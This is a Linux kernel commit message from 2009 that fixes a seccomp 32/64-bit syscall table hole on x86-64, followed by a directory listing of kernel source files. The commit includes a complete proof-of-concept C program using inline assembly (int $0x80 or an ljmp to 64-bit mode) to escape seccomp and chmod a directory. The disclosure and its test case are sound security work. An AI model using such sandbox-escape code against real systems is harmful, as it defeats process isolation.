linux/kernel
Roland McGrath 5b1017404a x86-64: seccomp: fix 32/64 syscall hole
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call.  A 64-bit process make a 32-bit system call with int $0x80.

In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table.  The fix is simple: test TS_COMPAT
instead of TIF_IA32.  Here is an example exploit:

	/* test case for seccomp circumvention on x86-64

	   There are two failure modes: compile with -m64 or compile with -m32.

	   The -m64 case is the worst one, because it does "chmod 777 ." (could
	   be any chmod call).  The -m32 case demonstrates it was able to do
	   stat(), which can glean information but not harm anything directly.

	   A buggy kernel will let the test do something, print, and exit 1; a
	   fixed kernel will make it exit with SIGKILL before it does anything.
	*/

	#define _GNU_SOURCE
	#include <assert.h>
	#include <inttypes.h>
	#include <stdio.h>
	#include <linux/prctl.h>
	#include <sys/stat.h>
	#include <unistd.h>
	#include <asm/unistd.h>

	int
	main (int argc, char **argv)
	{
	  char buf[100];
	  static const char dot[] = ".";
	  long ret;
	  unsigned st[24];

	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");

	#ifdef __x86_64__
	  assert ((uintptr_t) dot < (1UL << 32));
	  asm ("int $0x80 # %0 <- %1(%2 %3)"
	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
	  ret = snprintf (buf, sizeof buf,
			  "result %ld (check mode on .!)\n", ret);
	#elif defined __i386__
	  asm (".code32\n"
	       "pushl %%cs\n"
	       "pushl $2f\n"
	       "ljmpl $0x33, $1f\n"
	       ".code64\n"
	       "1: syscall # %0 <- %1(%2 %3)\n"
	       "lretl\n"
	       ".code32\n"
	       "2:"
	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
	  if (ret == 0)
	    ret = snprintf (buf, sizeof buf,
			    "stat . -> st_uid=%u\n", st[7]);
	  else
	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
	#else
	# error "not this one"
	#endif

	  write (1, buf, ret);

	  syscall (__NR_exit, 1);
	  return 2;
	}

Signed-off-by: Roland McGrath <roland@redhat.com>
[ I don't know if anybody actually uses seccomp, but it's enabled in
  at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-03-02 15:41:30 -08:00
..
irq Merge branch 'core/xen' into x86/urgent 2009-02-04 14:54:56 +01:00
power PM: Split up sysdev_[suspend|resume] from device_power_[down|up] 2009-02-22 10:33:44 -08:00
time
trace tracing: limit the number of loops the ring buffer self test can make 2009-02-18 22:50:01 -05:00
.gitignore
acct.c
async.c async: use list_move_tail 2009-02-08 10:00:26 -08:00
audit.c
audit.h
audit_tree.c
auditfilter.c
auditsc.c
backtracetest.c
bounds.c
capability.c
cgroup.c cgroups: fix possible use after free 2009-02-18 15:37:54 -08:00
cgroup_debug.c
cgroup_freezer.c
compat.c
configs.c
cpu.c
cpuset.c
cred-internals.h
cred.c
delayacct.c
dma-coherent.c
dma.c
exec_domain.c
exit.c signal: re-add dead task accumulation stats. 2009-02-05 13:04:33 +01:00
extable.c
fork.c Merge branch 'timers-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip 2009-02-11 08:24:32 -08:00
freezer.c
futex.c futex: fix reference leak 2009-02-11 18:24:08 +01:00
futex_compat.c
hrtimer.c
itimer.c timers: split process wide cpu clocks/timers 2009-02-05 13:04:33 +01:00
kallsyms.c
Kconfig.freezer
Kconfig.hz
Kconfig.preempt
kexec.c PM: Split up sysdev_[suspend|resume] from device_power_[down|up] 2009-02-22 10:33:44 -08:00
kfifo.c
kgdb.c
kmod.c
kprobes.c
ksysfs.c
kthread.c
latencytop.c
lockdep.c
lockdep_internals.h
lockdep_proc.c
Makefile PM: fix build for CONFIG_PM unset 2009-02-21 14:17:17 -08:00
marker.c
module.c modules: Use a better scheme for refcounting 2009-02-02 19:17:55 -08:00
mutex-debug.c
mutex-debug.h
mutex.c
mutex.h
notifier.c
ns_cgroup.c
nsproxy.c
panic.c
params.c
pid.c
pid_namespace.c
pm_qos_params.c
posix-cpu-timers.c timers: more consistently use clock vs timer 2009-02-13 13:04:05 +01:00
posix-timers.c
printk.c PM: Fix suspend_console and resume_console to use only one semaphore 2009-02-21 14:17:18 -08:00
profile.c profiling: fix broken profiling regression 2009-02-10 00:50:37 +01:00
ptrace.c
rcuclassic.c
rcupdate.c
rcupreempt.c
rcupreempt_trace.c
rcutorture.c
rcutree.c
rcutree_trace.c
relay.c
res_counter.c
resource.c
rtmutex-debug.c
rtmutex-debug.h
rtmutex-tester.c
rtmutex.c
rtmutex.h
rtmutex_common.h
rwsem.c
sched.c sched: cpu hotplug fix 2009-02-12 11:57:36 +01:00
sched_clock.c
sched_cpupri.c
sched_cpupri.h
sched_debug.c
sched_fair.c sched: revert recent sync wakeup changes 2009-02-11 14:43:35 +01:00
sched_features.h
sched_idletask.c
sched_rt.c sched_rt: don't use first_cpu on cpumask created with cpumask_and 2009-02-01 10:49:52 +01:00
sched_stats.h timers: split process wide cpu clocks/timers 2009-02-05 13:04:33 +01:00
seccomp.c x86-64: seccomp: fix 32/64 syscall hole 2009-03-02 15:41:30 -08:00
semaphore.c
signal.c signal: re-add dead task accumulation stats. 2009-02-05 13:04:33 +01:00
smp.c
softirq.c
softlockup.c
spinlock.c
srcu.c
stacktrace.c
stop_machine.c
sys.c revert "rlimit: permit setting RLIMIT_NOFILE to RLIM_INFINITY" 2009-02-05 12:56:47 -08:00
sys_ni.c
sysctl.c mm: fix dirty_bytes/dirty_background_bytes sysctls on 64bit arches 2009-02-11 14:25:35 -08:00
sysctl_check.c
taskstats.c
test_kprobes.c
time.c
timeconst.pl
timer.c
tracepoint.c
tsacct.c
uid16.c
up.c
user.c User namespaces: Only put the userns when we unhash the uid 2009-02-13 08:07:40 -08:00
user_namespace.c Fix recursive lock in free_uid()/free_user_ns() 2009-02-27 16:26:21 -08:00
utsname.c
utsname_sysctl.c
wait.c wait: prevent exclusive waiter starvation 2009-02-05 12:56:48 -08:00
workqueue.c